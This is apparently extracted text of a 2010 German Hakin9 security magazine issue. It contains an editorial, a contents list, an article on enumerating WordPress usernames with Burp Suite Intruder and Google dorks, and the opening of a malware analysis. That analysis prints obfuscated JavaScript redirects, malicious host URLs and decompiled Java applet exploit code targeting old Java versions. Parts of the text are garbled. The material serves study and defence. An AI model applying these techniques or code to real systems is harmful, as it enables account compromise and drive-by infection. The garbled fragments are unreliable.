Magazin als PDF - Bites, Bytes and my 5 cents - portfolio
Magazin als PDF - Bites, Bytes and my 5 cents - portfolio
Magazin als PDF - Bites, Bytes and my 5 cents - portfolio
Sie wollen auch ein ePaper? Erhöhen Sie die Reichweite Ihrer Titel.
YUMPU macht aus Druck-PDFs automatisch weboptimierte ePaper, die Google liebt.
LIEBE HAKIN9 LESER,<br />
Das Hauptthema dieser Ausgabe von Hakin9 ist Penetration Testing. Im Jahr<br />
2010 ist es kein Problem mehr, ein Netzwerk vor Gefahren zu schützen. Ist<br />
es wirklich so?<br />
Darüber erfahren Sie aus dem Artikel von Dimitri Roschkowski “Penetration<br />
���������������������������������������������������������������������<br />
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun<br />
���� ���������� ����� ���� ���� ����� ������ �������������� ���� ����������<br />
Schadsoftware installieren. Das eleven Research-Team hat ein Beispiel näher<br />
�����������������������������������������������������������������������������<br />
Peick “Malware-Doppelschlag per JavaScript und JavaApplet“ in der Rubrik<br />
Fortgeschrittene.<br />
In der letzten Ausgabe hat Andreas Lentwojt ausführlich die Norm ISO/IEC<br />
27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben. Ein<br />
Teil dieser Familie ist die ISO 27005, die sich mit dem IT-Risikomanagement<br />
befasst. In der heutigen Ausgabe wird der Autor in dem Artikel “IT-<br />
Risikomanagement – Wozu brauche ich das?“ darstellen, warum es nützlich<br />
ist, sich mit dem Risikomanagement der IT zu beschäftigen und dabei auf das<br />
Modell der ISO 27005 zurück zu greifen. Auf dieses Thema wurde bereits in<br />
einer früheren Ausgabe eingegangen, in diesem Artikel wird aber mehr auf die<br />
Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen.<br />
Heutzutage sind wir überall von Computern umgeben. In der IT-Branche<br />
herrscht trotzdem ein Frauenmangel. Warum ist es so? Woraus resultieren die<br />
Vorurteile gegen die Frauen, die sich mit Computern beschäftigen? Wie sieht<br />
die Situation von Frauen in der IT-Branche aus?<br />
Auf diese und viele <strong>and</strong>ere Fragen antwortet unsere Gesprächspartnerin<br />
Ulrike Peter im Interview „Erfolgreiche Frauen in der IT-Branche - ein<br />
Erfahrungsbericht“, das in dieser Ausgabe von Hakin9 besonders zu empfehlen<br />
ist.<br />
Sie möchten unser Heft jeden Monat automatisch bekommen? Nichts einfacher<br />
<strong>als</strong> dies. Registrieren Sie sich für unseren Newsletter auf www.hakin9.org/<br />
de und Sie werden regelmäßig jede Hakin9 Ausgabe in Ihrem E-Mail-Account<br />
����������� ����� �������� ���� �������� ������������ ��� ������� ���������������<br />
schickt.<br />
Ich hoffe, dass wir mir dieser Ausgabe Ihren Herausforderungen gewachsen<br />
sind.<br />
Viel Spaß beim Lesen!<br />
�������������������<br />
5/2009 HAKIN9<br />
4
INHALTSVERZEICHNIS<br />
FÜR EINSTEIGER<br />
06 User Enumeration bei Web-Applikationen<br />
Kai Renz<br />
Wo der normale Benutzer nicht hin soll, wo wichtige<br />
Daten nur für einen kleinen Kreis an Personen zugänglich<br />
sein sollen, wo administrative Aufgaben erledigt<br />
werden - überall dort werden Authentifizierungen eingesetzt.<br />
herausgegeben vom Verlag:<br />
Software Press Sp. z o. o. SK<br />
Geschäftsführer: ���������������<br />
Managing Director: ��������������<br />
ewa.lozowicka@software.com.pl<br />
Chefredakteurin:��������������������<br />
ilona.przybyslawska@software.com.pl<br />
Redaktion/Betatester: Kai Renz, Michael<br />
Peick, Dimitri Roschkowski, Helmut Kaufmann,<br />
Andreas Lentwojt, Patrick Schmid,<br />
Tobias Glemser, Ulrike Peter, Nicole Huck,<br />
Michael Schratt<br />
Produktion: Andrzej Kuca<br />
DTP: ����������������������<br />
Umschlagsentwurf: ����������������������<br />
Werbung: adv@software.com.pl<br />
Anschrift:<br />
Software Press Sp. z o.o. SK<br />
ul. Bokserska 1, 02-682 Warszawa, Pol<strong>and</strong><br />
Tel. +48 22 427 36 56, Fax +48 22 244 24 59<br />
www.hakin9.org/de<br />
Die Redaktion bemüht sich, dafür Sorge zu<br />
tragen, dass die in der Zeitschrift sowie auf<br />
den begleitenden Datenträgern erhaltenen<br />
Informationen und Anwendungen zutreffend<br />
und funktionsfähig sind, übernimmt jedoch<br />
keinerlei Gewähr für derer Geeignetheit für<br />
bestimmte Verwendungszwecke. Alle Markenzeichen,<br />
Logos und H<strong>and</strong>elsmarken, die<br />
sich in der Zeitschrift befinden, sind registrierte<br />
oder nicht-registrierte Markenzeichen<br />
der jeweiligen Eigenümer und dienen nur <strong>als</strong><br />
inhaltliche Ergänzungen.<br />
FORTGESCHRITTENE<br />
10/2010<br />
11 Malware-Doppelschlag per JavaScript und<br />
JavaApplet<br />
Michael Peick<br />
Besonders in diesem Jahr steigt die Anzahl der E-Mails<br />
die ohne Zutun des Anwenders oder nur mit sehr wenig<br />
Einflussnahme des Anwenders Schadsoftware installieren.<br />
Das eleven Research-Team hat ein Beispiel<br />
näher untersucht.<br />
PRAXIS<br />
17 Penetration Testing im Jahre 2010<br />
Dimitri Roschkowski<br />
Viele Administratoren übersehen leider bei der Absicherung<br />
des Netzwerkes seine physikalische Sicherheit.<br />
Die Bedrohung kommt nicht nur durch das Ethernet-Kabel.<br />
ABWEHR<br />
25 OCTAVE – Hier macht das Risiko die Musik<br />
Helmut Kaufmann<br />
Die überwiegende Mehrheit von Unternehmen sind<br />
nach regulativen Vorgaben wie z.B. Basel II, Solvency<br />
II, SOX, 8. EU Auditrichtlinie oder SAS 70 angehalten<br />
ein nachhaltiges und nachvollziehbares Risikomanagement<br />
und Business Continuity Planning zu implementieren.<br />
Anmerkung!<br />
Die in der Zeitschrift demonstrierten Techniken<br />
sind AUSSCHLIEßLICH in eigenen Rechnernetzen<br />
zu testen! Die Redaktion übernimmt<br />
keine Haftung für eventuelle Schäden oder<br />
Konsequenzen, die aus der unangemessenen<br />
Anwendung der beschriebenen Techniken<br />
entstehen. Die Anwendung der dargestellten<br />
Techniken kann auch zum Datenverlust führen!<br />
hakin9 erscheint in folgenden Sprachversionen<br />
und Ländern: deutsche Version (Deutschl<strong>and</strong>,<br />
Schweiz, Österreich, Luxemburg), französische<br />
Version (Frankreich, Kanada, Belgien, Marokko),<br />
spanische Version (Spanien, Portugal),<br />
polnische Version (Polen), englische Version<br />
(Kanada, USA)<br />
4 6/2010
30 IT-Risikomanagement – Wozu brauche ich<br />
das?<br />
Andreas Lentwojt<br />
In der letzen Ausgabe habe ich Ihnen ausführlich die<br />
Norm ISO/IEC 27001 vorgestellt und einen kurzen Einblick<br />
in die 27000-Familie gegeben. Ein Teil dieser Familie<br />
ist die ISO 27005, die sich mit dem IT-Risikomanagement<br />
befasst.<br />
ANGRIFF<br />
37 DNS Cache Poisoning<br />
Patrick Schmid<br />
Als Ergänzung zu meinem ersten Artikel Java Applet<br />
Attacke erfahren wir hier, wie wir ein Opfer mittels DNS<br />
Spoofing unbemerkt eine präparierte Seite unterschieben<br />
können.<br />
INTERVIEW<br />
41 Interview mit Tobias Glemser<br />
„Sicherheit darf nicht erst am Ende von neuen Anwendungen,<br />
Produkten oder Projekten <strong>als</strong> Kontrollinstrument<br />
einbezogen, sondern muss <strong>als</strong> integraler und vor<br />
Allem unterstützender Best<strong>and</strong>teil eines erfolgreichen<br />
Produkts gesehen werden.“<br />
Mehr erfahren Sie aus dem Interview mit Tobias Glemser<br />
– leitender IT-Sicherheitsberater bei der Tele-Consulting<br />
security networking training GmbH in Gäufelden<br />
bei Stuttgart und verantwortlich für den Geschäftsbereich<br />
Penetrationstests.<br />
InhaltsverzeIchnIs<br />
44 Interview mit Ulrike Peter<br />
„Die IT ist (und bleibt es sicher auch) eine Männerdomäne<br />
– Frauen in der IT-Branche sind Paradiesvögel.“<br />
Mehr erfahren Sie aus dem Interview mit Ulrike Peter –<br />
freie Journalistin und seit zehn Jahren für unterschiedliche<br />
Unternehmen und Medien in der IT-Branche tätige<br />
PR-Spezialistin.<br />
REZENSIONEN<br />
46 SAP for DFPS Implementierung und Customizing<br />
Nicole Huck<br />
Das Buch SAP for DFPS Implementierung und Customizing,<br />
basiert auf mehr <strong>als</strong> 20 Jahren Erfahrung,<br />
die die Autoren insgesamt bei der Entwicklung, Implementierung,<br />
aber auch Schulung der Lösung sammeln<br />
konnten.<br />
Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem<br />
deutschen Recht stattgefunden haben und die IT-Sicherheit betreffen,<br />
möchten wir ankündigen, dass hakin9-Abwehrmethoden<br />
<strong>Magazin</strong> seinem Profil treu bleibt.<br />
Unser <strong>Magazin</strong> dient ausschließlich den Erkenntniszwecken.<br />
Alle im <strong>Magazin</strong> präsentierten Methoden sollen für eine sichere IT<br />
fungieren. Wir legen einen großen Wert auf die Entwicklung von<br />
einem sicheren elektronischen Umsatz im Internet und der Bekämpfung<br />
von IT Kriminalität.<br />
hakin9.org/de 5
6<br />
FÜR EINSTEIGER<br />
User Enumeration bei<br />
Web-Applikationen<br />
Kai Renz<br />
Wo der normale Benutzer nicht hin soll, wo wichtige Daten nur<br />
für einen kleinen Kreis an Personen zugänglich sein sollen, wo<br />
administrative Aufgaben erledigt werden - überall dort werden<br />
Authentifizierungen eingesetz.<br />
IN DIESEM ARTIKEL ERFAHREN SIE...<br />
��� �����������������������������������������������������������<br />
����������<br />
��� ���� ���� ����� ������������ ���� ������������������ ��������ren<br />
��� ���� ���� ����������� �������������� ������� ���������� ���den<br />
Das Problem mit solchen Authentifizierung ist,<br />
dass sie nur maximal so sicher sind, wie ihr<br />
schwächstes Glied. Durch das Web 2.0 wird immer<br />
mehr auf Komfort und Benutzerfreundlichkeit gesetzt,<br />
wodurch einfache Sicherheitsmechanismen ihre<br />
Wirkung verfehlen. Bruteforce Angriffe galten durch<br />
die schier unendlichen Kombinationsmöglichkeiten <strong>als</strong><br />
„nicht mehr praktikabel“. Viele Seiten erlauben es uns<br />
aber, die Anzahl an Versuchen drastisch einzuschränken,<br />
da sie Informationen preisgeben, die einen Angriff<br />
oftm<strong>als</strong> bedeutend einfacher machen.<br />
Wenn Sie sich heute im Internet herumtreiben, finden<br />
Sie sich zwischen Social Networks, Auktionsplattformen<br />
und Tauschbörsen wieder. Identitäten werden im<br />
Netz frei und für jedermann zugänglich eingestellt, und<br />
manch einem kommt es vor, wie wenn er durch Twitter<br />
und Co. mehr über seinen Nachbarn wüsste, wie<br />
über seinen langjährigen Freund. Obwohl viele immer<br />
noch der Ansicht sind, sich frei und anonym im Internet<br />
bewegen zu können, so stellen sie doch Details über<br />
ihr Leben jedem frei zur Verfügung. Sie denken ein frei<br />
erfundener Benutzername halte die meisten davon ab<br />
ihre wahre Identität herauszufinden? Lassen Sie sich<br />
gesagt sein das dies ein Irrtum ist – ein sehr großer Irrtum!<br />
Die Gefahr, die all dies mit sich bringt, ist leicht zur<br />
erklären: Stellen Sie sich vor, sie arbeiten in einem großen<br />
Telekommunikationsunternehmen. Über Facebook<br />
und Xing halten Sie gerne Kontakt mit Kollegen aus<br />
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...<br />
�� ������������������������������������������������������<br />
�� ������������������������������������<br />
dem Ausl<strong>and</strong> – dafür sind diese Plattformen ja schließlich<br />
auch bestens geeignet. Doch was, wenn jem<strong>and</strong> ihr<br />
Konto übernimmt und unter Ihrem Namen dort Humbug<br />
treibt? Stellen Sie dies nicht sofort fest, so kann diese<br />
Internetplattform schnell zu einem sehr großen Problem<br />
werden. Schon bei der Anmeldung bei diesen Seiten legen<br />
wir unsere wichtigen Daten in die Hände der Betreiber,<br />
ohne das uns eigentlich wirklich interessiert, wofür<br />
diese weiter verwendet werden. Erst wenn mal wirklich<br />
ein großer Sk<strong>and</strong>al an die Oberfläche dringt, herrscht<br />
Empörung und die allgemeine „ich hab‘s doch gesagt“-<br />
Stimmung kommt auf. Bei Spammern und Crackern<br />
sind Accounts zu Auktionsplattformen, Email-Konten<br />
und Social Networks sehr beliebt da viele Benutzer für<br />
mehrere Zugänge das selbe Passwort verwenden und<br />
so zum Beispiel durch den eBay-Account auf Rechnung<br />
des Opfers eingekauft werden kann. Ein Benutzer kann<br />
hier nur wenige, trotzdem aber effektive Maßnahmen<br />
ergreifen. Ein sicheres Passwort zu wählen ist der erste<br />
und wichtigste Schritt, wobei immer mehr Passwörter<br />
über nicht-verschlüsselte Verbindungen und Keylogger<br />
abgefangen werden und somit auch das sicherste Passwort<br />
nutzlos ist. Ein zweiter Schritt wäre verschiedene<br />
Passwörter für die unterschiedlichen Seiten zu verwenden<br />
und diese regelmäßig zu erneuern. Dieser Schritt<br />
wird aber leider nur sehr selten wirklich umgesetzt, da<br />
er mit grossem Aufw<strong>and</strong> verbunden ist und die meisten<br />
Benutzer keine Lust haben sich mehrere verschiedene<br />
9/2010
Passwörter zu merken. Oftm<strong>als</strong> werden zwar viele verschiedene<br />
Zugangsdaten verwendet, durch das häufige<br />
wechseln, werden dann aber eher einfache Passwörter<br />
verwendet, damit der Benutzer sich diese leicht merken<br />
kann.<br />
Um einen Zugang zum Benutzerkonto des Anwenders<br />
zu bekommen, sind meist ein Benutzername und<br />
ein Passwort nötig. Oftm<strong>als</strong> fangen hier schon die Probleme<br />
an. Hat der Angreifer herausgefunden, dass sich<br />
die Benutzer durch eine Email-Passwort-Kombination<br />
anmelden können, muss er schon mal viel weniger Zeit<br />
investieren, den Benutzernamen herauszufinden, was<br />
bei einem Bruteforce-Angriff ein Zeitvorteil sein, welcher<br />
zwischen durchführbar und nicht durchführbar, <strong>als</strong>o<br />
Erfolg und Misserfolg entscheidet. Oftm<strong>als</strong> reicht <strong>als</strong>o<br />
schon eine simple Registrierung bei einer Zielseite<br />
um die Feinheiten einer Anmeldefunktion herauszufinden<br />
und auszunutzen. Kann ein Benutzer seinen Nicknamen<br />
frei wählen, so sind die Möglichkeiten bei einem<br />
Bruteforce-Angriff wieder immens, sodass der Angreifer<br />
eine <strong>and</strong>ere Taktik wählen muss. Er wird versuchen<br />
ohne mühsames Durchprobieren von Kombinationen<br />
an den Benutzernamen zu kommen oder einen <strong>and</strong>eren<br />
Schwachpunkt im System ausnutzen. In diesem<br />
Artikel werde ich ein paar einfache Möglichkeiten darstellen<br />
um einer Web-Applikation Benutzernamen zu<br />
entlocken (User Enumeration) und diese automatisch<br />
aufzunehmen.<br />
Wie bereits oben beschrieben kann sich der Angreifer,<br />
sofern er dazu berechtigt ist, zuerst ein Bild vom Registrierungs-<br />
bzw. Login-Mechanismus machen. Findet<br />
er beispielsweiße heraus dass der Benutzername eine<br />
Mailadresse ist, so kann er leicht Suchmaschinen oder<br />
Social Networks verwenden, um diese herauszufinden.<br />
Werden frei wählbare Benutzernamen verwendet, so<br />
fällt diese Art von Recherche weitestgehend aus, wobei<br />
natürlich auch hier manchmal ein Glückstreffer dabei<br />
sein kann. In so einem Fall wird der Angreifer aber<br />
Abbildung 1. Funktionsweiße einfache User Enumeration<br />
User Enumeration bei Web-Applikationen<br />
Request Response<br />
Benutzername: 1a2a3d4f<br />
Passwort: sosecret<br />
Benutzername: foobar<br />
Passwort: sosecret<br />
Bruteforce<br />
Benutzername: foobar<br />
Passwort: topsecret<br />
<strong>and</strong>ers vorgehen: er überprüft den Login-Mechanismus<br />
auf Ausgaben, welche den Benutzernamen verraten<br />
oder Hinweise darauf geben könnten ob der zum Test<br />
angegebene Name ein wahrer Benutzername ist. Hinweise<br />
darauf geben Rückgaben wie „Das für diesen Benutzernamen<br />
angegebene Passwort ist nicht korrekt!“<br />
oder ähnliches. Gegengeprüft werden kann dies durch<br />
die Eingabe eines fiktiven Benutzers. Variiert die Ausgabe<br />
von der obigen so ist es sehr wahrscheinlich dass<br />
der zuvor verwendete Name korrekt war.<br />
Ein weiterer Angriffsvektor ist die „Passwort-vergessen-Funktion“.<br />
Ist solch eine Funktion schlecht geschrieben,<br />
oder ist diese einfach nur zu leichtsinnig<br />
dem Benutzer Komfortfunktionen anzubieten, können<br />
für den Angreifer wichtige Informationen preisgeben<br />
werden. Eine Fehlkonfiguration, bzw. leichtsinnige Web<br />
2.0 Funktion, wie die eben angesprochene, kann zum<br />
Beispiel bei Eingabe der Mailadresse auf der Passwort-<br />
Vergessen-Seite mit einem Satz wie „Eine Email mit<br />
Ihrem neuen Passwort für den Benutzeraccount <br />
wurde erfolgreich an Sie zugestellt“ antworten,<br />
wodurch der wahre Benutzer zwar eine Email, der Angreifer<br />
jedoch auch den Benutzernamen erhält. Ist die<br />
angegebene Sicherheitsadresse inaktiv oder wird nur<br />
sporadisch verwendet, so geht diese Email leicht unter<br />
und der Angreifer kann mit seiner Arbeit fortfahren.<br />
Ein gutes Beispiel hierfür ist Wordpress. Auch in seiner<br />
neuesten Version kann über die „Passwort-vergessen-<br />
Funktion“ der Benutzername herausgefunden werden.<br />
Ein sogenannter Bot-Schutz ist nicht vorh<strong>and</strong>en, sodass<br />
wir das ganze mit einem Webproxy, in unserem<br />
Fall Burpsuite, automatisieren können.<br />
Durch eine lokale Recherche an einem Wordpress<br />
haben wir herausgefunden, dass beim Eingeben eines<br />
f<strong>als</strong>chen Benutzernamens ein Fehler zurückgegeben<br />
wird: ERROR: Invalid username or e-mail. Verwenden<br />
wir jedoch den richtigen Benutzernamen erhalten wir<br />
ein: Check your e-mail for the confirmation link.<br />
Benutzer oder Passwort f<strong>als</strong>ch<br />
F<strong>als</strong>ches Passwort<br />
Login erforgreich!<br />
hakin9.org/de 7
8<br />
Nun müssen wir uns genauer ansehen was zwischen<br />
unserem Client und dem Webserver kommuniziert wird.<br />
Hierfür starten wir Burpsuite und konfigurieren unseren<br />
Browser so dass er <strong>als</strong> Proxy localhost auf Port 8080<br />
verwendet. Als nächstes wechseln wir in den Proxy-Tab<br />
und setzen Intercept auf Off. Durch das Deaktivieren<br />
dieser Funktion verhindern wir, das uns Burpuite bei<br />
jedem Schritt frägt, ob wir die Daten wirklich zu unserem<br />
Webserver senden wollen. Als nächstes besuchen<br />
wird unsere Zielseite. Wordpress verwendet immer<br />
das gleiche Schema: http://www.zielseite.de/wp-login.<br />
php?action=lostpassword. Wir geben absichtlich einen<br />
f<strong>als</strong>chen Benutzernamen an und verfolgen wie die<br />
Abbildung 2. Unser POST-Request an Wordpress<br />
Abbildung 3. Der Parameter der verändert werden soll wird markiert<br />
FÜR EINSTEIGER<br />
POST-Anfrage und deren Antwort von Burpsuite aufgezeichnet<br />
werden. Dort können wir unter request -> params<br />
unsere gerade eingegebenen und noch weitere<br />
Daten betrachten (Abbildung 2).<br />
Als nächstes senden wir den Request per Rechtsklick<br />
an den Intruder. Das Target-Tab lassen wir unberührt,<br />
wir werden erst bei den Positions-Optionen aktiv.<br />
Wir klicken rechts auf „clear $“. Als Attacke verwenden<br />
wir Sniper. Ganz unten im Textfeld sehen wir eine Zeile<br />
mit „user_login“. Dies sind die Parameter die per POST<br />
übergeben werden. Ich markiere den zum Test eingegebenen<br />
Benutzername und klicke auf „add $“ (Abbildung<br />
3).<br />
9/2010
Nun müssen wir noch unser Payload konfigurieren. Hier<br />
verwenden wir „Payload Set 1, present list“. Man kann nun<br />
optional eine ganze Liste mit Benutzernamen laden, oder<br />
einfach per H<strong>and</strong> einige eintragen. Nun müssen wir noch<br />
unterscheiden lassen wann ein Benutzer gefunden wurde<br />
und wann nicht. Dazu gehen wir in den Option-Tab und<br />
scrollen zu grep. Wir aktivieren die Checkboxen bei „search<br />
responses for these expressions“ und „simple pattern<br />
match“. Außerdem drücken wir auf clear. Die voreingestellten<br />
Pattern brauchen wir nicht zu verwenden. Wir wissen<br />
dass bei Eingabe eines existierenden Benutzernamens ein<br />
„Check your e-mail for the confirmation link“ zurückgeliefert<br />
wird. Also tragen wir genau diesen Satz ein und klicken auf<br />
add. Nun geben wir noch an, dass wird redirects folgen wollen.<br />
Damit haben wir alles nötige konfiguriert. Wir klicken<br />
in der Menuleiste auf intruder -> start attack. Nach einer<br />
kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat<br />
zwei Benutzer identifiziert (Abbildung 3)! Eine gute Wörterliste<br />
erhöht die Effizient natürlich deutlich!<br />
Somit konnten wir leicht über die Passwort-Vergessen<br />
Funktion automatisiert Benutzer erfassen. Natürlich<br />
User Enumeration bei Web-Applikationen<br />
Abbildung 4. Burpsuite Intruder hat zwei Benutzer identifizieren können<br />
Listing 1. Google Dorks<br />
inurl:memberlist.php "Powered by phpBB"<br />
�������:php "memberlist"<br />
�������:txt "memberlist"<br />
�������:txt "usernames"<br />
�������:sql "users"<br />
funktioniert dies auch mit Registrierungssystemen die<br />
angeben ob ein Benutzername schon vergeben ist. Den<br />
Möglichkeiten sind hier nur durch die eigene Kreativität<br />
Grenzen gesetzt. Mit dieser simplen Methode gelingt<br />
es einem Angreifer automatisiert Benutzernamen zu finden<br />
– doch was kann noch passieren?<br />
Eine oft übersehene Tatsache ist dass das Problem<br />
oft vor der Tastatur sitzt. Sprich, der Admin hat etwas<br />
f<strong>als</strong>ch konfiguriert. So kann es vorkommen dass ganze<br />
Mitgliederlisten in Foren öffentlich zugänglich sind<br />
oder im Cache von Suchmaschinen gefunden werden<br />
können. Durch Suchmaschinen wie Google lassen sich<br />
solche f<strong>als</strong>ch konfigurierten Seiten leicht auffinden. Eine<br />
kleine Liste an Google Dorks ist in Listing 1 angegeben.<br />
Eine weitere Möglichkeit Benutzernamen zu identifizieren<br />
sind URLs. Twitter ist hier ein schönes Beispiel.<br />
Jeder Benutzer kann sich unter twitter.com/benutzername<br />
austoben. Dies stellt eine weitere Möglichkeit dar<br />
automatisch Namen zu entlarven. Wie bereits erwähnt<br />
gibt es unzählige Möglichkeiten User Enumeration zu<br />
betreiben wodurch Bruteforce eine nicht zu unterschätzende<br />
Möglichkeit bleibt.<br />
KAI RENZ<br />
Der Autor befindet sich gerade in Ausbildung zum Fachinformatiker<br />
für Systemintegration. In seiner Freizeit beschäftigt<br />
er sich mit Themen rund um IT-Sicherheit und Penetration Testing.<br />
Kontakt mit dem Autor: kai.renz@proof-of-concept.org<br />
hakin9.org/de 9
2010<br />
www.sigs-datacom.de<br />
Kontakt: Anja Keß, · Lindlaustraße 2c, D-53842 Troisdorf,<br />
Tel.: +49 (0) 22 41 / 23 41-201 · Fax: +49 (0) 22 41 / 23 41-199 · Email: anja.kess@sigs-datacom.de<br />
Erfolgreich durch Wissensvermittlung aus 1. H<strong>and</strong><br />
� Die ultimative Hacking-Akademie<br />
� Erfolgreiche Abwehr von Hacker-Angriffen und<br />
sicherer Schutz Ihres Netzwerks<br />
Klaus Dieter Wolfinger<br />
20. – 22. September 2010<br />
03. – 05. November 2010, Frankf./M. 2.150,- € zzgl. MwSt.<br />
� Best Practices für sichere Web-Anwendungen<br />
� Sicherheitslücken in Webanwendungen vermeiden,<br />
erkennen und schließen – gemäß Empfehlung des BSI<br />
Thomas Schreiber<br />
25. – 26. Oktober 2010, Düsseldorf<br />
08. – 09. Dezember 2010, München 1.590,- € zzgl. MwSt.<br />
� Sicherheit mit WebService-Infrastrukturen<br />
Jörg Bartholdt<br />
25. – 26. Oktober 2010,<br />
22. – 23. November 2010, München 1.590,- € zzgl. MwSt.<br />
� Cloud Computing im praktischen Einsatz<br />
Arnd Kleinbeck & Stefan Tilkov<br />
24. Oktober 2010, München<br />
10. Dezember 2010, Köln 990,- € zzgl. MwSt.<br />
� iPhone Grundlagen und Entwicklung<br />
Hendrik Schreiber<br />
11. – 12. Oktober 2010, Köln<br />
11. – 12. Dezember 2010, Köln 1.590,- € zzgl. MwSt.<br />
www.sigs-datacom.de<br />
� NEU – jetzt 3-tägig:<br />
CSM Certified ScrumMaster Course<br />
� Voraussetzung für die Zertifizierung zum Scrum Master<br />
Sabine C<strong>and</strong>itt<br />
25. – 27. Oktober 2010, München<br />
07. – 09. Dezember 2010, München 2.150,- € zzgl. MwSt.<br />
� Secure Coding mit Java EE<br />
� Entwicklung einbruchssicherer Webanwendungen<br />
und Webservices unter Java EE<br />
Mirko Richter<br />
26. – 27. Oktober 2010,<br />
06. – 07. Dezember 2010, München 1.590,- € zzgl. MwSt.<br />
� Web Application Firewall Starter<br />
� Essentielles Web Application Firewall Grundwissen<br />
Achim Hoffmann<br />
17. November 2010, München 990,- € zzgl. MwSt.<br />
� Advanced Web Application Security Testing<br />
� Professionelle Sicherheitsuntersuchungen von<br />
Enterprise-Webanwendungen durchführen<br />
Thomas Schreiber<br />
01. – 02. Dezember 2010, München 1.590,- € zzgl. MwSt.<br />
www.sigs-datacom.de
Malware-Doppelschlag per JavaScript und JavaApplet<br />
Malware-Doppelschlag per<br />
JavaScript und JavaApplet<br />
Automatischer Download durch JavaScript und<br />
Ausbruch aus der Virtuellen Java Umgebung<br />
Michael Peick<br />
Besonders in diesem Jahr steigt die Anzahl der E-Mails<br />
die ohne Zutun des Anwenders oder nur mit sehr wenig<br />
Einflussnahme des Anwenders Schadsoftware installieren.<br />
Das eleven Research-Team hat ein Beispiel näher untersucht.<br />
IN DIESEM ARTIKEL ERFAHREN SIE...<br />
�� �������������������������������������������������������������<br />
wird.<br />
Es h<strong>and</strong>elt sich dabei um eine E-Mail die massenhaft<br />
vers<strong>and</strong>t wird und eine Website/HTML-Datei<br />
<strong>als</strong> Anhang enthält. Die E-Mail hat eine unverfängliche<br />
Betreffzeile wie „Re: Vacation“ oder „R<strong>and</strong>olph<br />
Plans“ und einen ebenfalls unverdächtigen Text<br />
wie beispielsweise:<br />
„Thank you very much for meeting with me on Saturday.<br />
Attached are the plans for the R<strong>and</strong>olph Street Development<br />
project we discussed. If you have any questions<br />
please don't hesitate to contact me.<br />
Thanks again.“<br />
Im HTML-Anhang befindet sich ein eingebetteter<br />
JavaScript Code. Um die Erkennung des JavaScript<br />
Codes zu erschweren, wurde er verschleiert/unleserlich<br />
gemacht, in der Fachsprache auch <strong>als</strong> Obfuscation bezeichnet<br />
(vgl. Listing 1.).<br />
Listing 1. Die Datei "39035xls.html":<br />
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...<br />
�� ��������������� ���� ������������ ���� ����������� ���� ����-<br />
Script und HTML.<br />
Wird die Datei "39035xls.html" im Anhang im Browser<br />
aufgerufen, dann wird der Nutzer mittels des JavaScripts<br />
an eine bestimmte Internetseite weitergeleitet,<br />
die Schadcode enthält. Schreibt man das JavaScript-<br />
Codefragment leserlicher, dann sieht man, dass eine<br />
Weiterleitung zur Seite "http://numerouno-india.com/x.<br />
html" führt 1 (vgl. Listing 2.).<br />
Auf der weitergeleiteten WebSite sieht man eine<br />
weitere Weiterleitung an die URL "http://scaner-g.<br />
cz.cc/scanner10/?afid=24". Interessant ist hier nicht<br />
die Weiterleitung an eine weitere Seite, sondern die<br />
Tatsache, dass ein unsichtbares iFrame mit Breite<br />
0 Pixel und Höhe 0 Pixel geladen wird. Schauen<br />
wir uns die dahinterliegende Seite "http://arestyute.<br />
com/sadhbdsa879321jbdas/index.php" etwas genauer<br />
an (vgl. Listing 3.).<br />
function etgr(zj4r){var\nbo97,bvgy="",kpn8,iyv2="0ocdfu<br />
m;ip/qrlx=nt.-:v he>s"a;a
12<br />
Hier ist ein Java-Applet eingebettet, welches beim<br />
Aufruf der Seite von der Java-Virtual-Machine ausgeführt<br />
wird, sofern diese im Browser installiert und aktiviert<br />
ist. Ein weiterer verschleierter JavaScript-Code findet<br />
sich ebenfalls.<br />
Zunächst analysieren wir das Java-Applet "tmp/des.<br />
jar". In der Datei befinden sich drei Java-Klassen von<br />
denen eine Namens dev.s.AdgredY <strong>als</strong> Einsprungspunkt<br />
für das Applet dient. Mit einem Java-Decompiler<br />
kann man die Klassen, welche momentan in Java-Bytecode<br />
vorliegen, in leserlichen Java-Quelltext überführen.<br />
Dies entspricht nicht ganz dem originalem Quelltext,<br />
kommt ihm aber recht nahe. Wir benutzen dafür<br />
den Decompiler von http://java.decompiler.free.fr/.<br />
Schaut man sich nun den Java-Quelltext an, stellt man<br />
fest, dass keine Obfuscation für Java, wie z.B. das unter<br />
der GPL 2+ stehende ProGuard, benutzt wurden.<br />
Was zu erwarten gewesen wäre, um die Erkennung zu<br />
erschweren.<br />
Nach einer Verifikation der <strong>als</strong> Parameter übergebenen<br />
URL "http://arestyute.com/sadhbdsa879321jbdas/l.<br />
php?deserialize=6e&i=1" wird abhängig von der Java-<br />
Listing 2. Weiterleitung an eine weitere Seite<br />
function etgr(zj4r) {<br />
var<br />
bo97, bvgy = "",<br />
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s"as"a;a
Malware-Doppelschlag per JavaScript und JavaApplet<br />
Listing 3. Seite „http://arestyute.com/sadhbdsa879321jbdas/<br />
index.php” (gekürztes HTML Dokument):<br />
<br />
<br />
<br />
<br />
<br />
<br />
var cmjve3="d.
14<br />
Listing 4b. Verifikation der <strong>als</strong> Parameter übergebenen<br />
URL „http://arestyute.com/sadhbdsa879321jbdas/l.<br />
php?deserialize=6e&i=1”<br />
Object localObject1;<br />
Object localObject2;<br />
Object localObject4;<br />
Object localObject5;<br />
String str20;<br />
String str21;<br />
String str22;<br />
if ((((java_version.indexOf("1.6.0_11") != -1) ||<br />
(java_version.indexOf("1.6.0_12") != -1) ||<br />
(java_version.indexOf("1.6.0_13") != -1) ||<br />
(java_version.indexOf("1.6.0_14") != -1) ||<br />
(java_version.indexOf("1.6.0_15") != -1) ||<br />
(java_version.indexOf("1.6.0_16") != -1) ? 1 : 0) &<br />
(url.indexOf("i=1") == -1 ? 1 : 0)) != 0)<br />
{<br />
/**<br />
* Java midi vulnerable, see http://<br />
vreugdenhilresearch.nl/2010/05/<br />
java-midi-parse-vulnerabilities/<br />
* for detailed explaination. The author claims, that it<br />
was ���� in java 1.6.0_19<br />
*/<br />
localObject1 = "";<br />
localObject1 = repeat('/', 303);<br />
